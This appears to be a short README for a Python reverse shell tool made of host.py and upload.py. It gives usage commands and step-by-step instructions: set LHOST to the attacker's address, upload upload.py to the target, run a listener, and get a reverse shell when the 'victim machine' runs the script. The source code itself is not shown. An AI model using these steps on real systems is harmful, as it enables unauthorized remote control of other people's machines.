A basic python reverse shell using sockets.
Usage:
$ python3 host.py
$ python3 upload.py [HOST IP]
1.Change 'LHOST' in upload.py to your ip address or the ip of the server which you need to get the reverse a connection. 2.Then upload the upload.py to the target. 3.Run the host.py in your host machine. 4.When ever the upload.py is run in the victim machine then you get a reverse shell.